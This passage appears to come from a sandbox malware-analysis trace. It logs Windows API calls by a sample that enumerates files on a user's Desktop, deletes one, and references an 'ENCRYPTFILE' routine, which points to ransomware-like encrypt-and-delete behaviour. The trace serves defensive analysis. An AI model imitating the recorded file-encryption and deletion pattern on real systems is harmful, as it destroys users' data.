RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0123.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0123.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.402] CloseHandle (hObject=0x258) returned 1 [0123.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0123.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.403] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3", lpFilePart=0x0) returned 0x29 [0123.403] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i4imk8upkmw_w.mp3")) returned 0x20 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0123.404] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9bb8c0, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0xfa80a9c0, ftLastAccessTime.dwHighDateTime=0x1d5eca6, ftLastWriteTime.dwLowDateTime=0xfa80a9c0, ftLastWriteTime.dwHighDateTime=0x1d5eca6, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="I4IMK8uPkmw_W.mp3", cAlternateFileName="I4IMK8~1.MP3")) returned 0x41ac200 [0123.404] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i4imk8upkmw_w.mp3")) returned 1 [0123.533] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9bb8c0, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0xfa80a9c0, ftLastAccessTime.dwHighDateTime=0x1d5eca6, ftLastWriteTime.dwLowDateTime=0xfa80a9c0, ftLastWriteTime.dwHighDateTime=0x1d5eca6, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="I4IMK8uPkmw_W.mp3", cAlternateFileName="I4IMK8~1.MP3")) returned 0 [0123.533] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0123.539] TranslateMessage (lpMsg=0x144f534) returned 0 [0123.539] DispatchMessageW (lpMsg=0x144f534) returned 0x0 [0123.539] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0123.539] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0123.539] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.539] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0123.539] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6ceb560, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x1063a710, ftLastAccessTime.dwHighDateTime=0x1d5e941, ftLastWriteTime.dwLowDateTime=0x1063a710, ftLastWriteTime.dwHighDateTime=0x1d5e941, nFileSizeHigh=0x0, nFileSizeLow=0xd6ba, dwReserved0=0x0, dwReserved1=0x8, cFileName="jHCQtc-oyo Hp07enJ.ots", cAlternateFileName="JHCQTC~1.OTS")) returned 0x41ac280 [0123.539] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0123.540] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e60 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0123.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0123.541] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0123.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0123.541] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0123.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0123.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0123.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0123.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0123.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.543] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0123.544] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0123.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0123.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.545] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0123.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\jhcqtc-oyo hp07enj.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.546] FreeLibrary (hLibModule=0x772d0000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 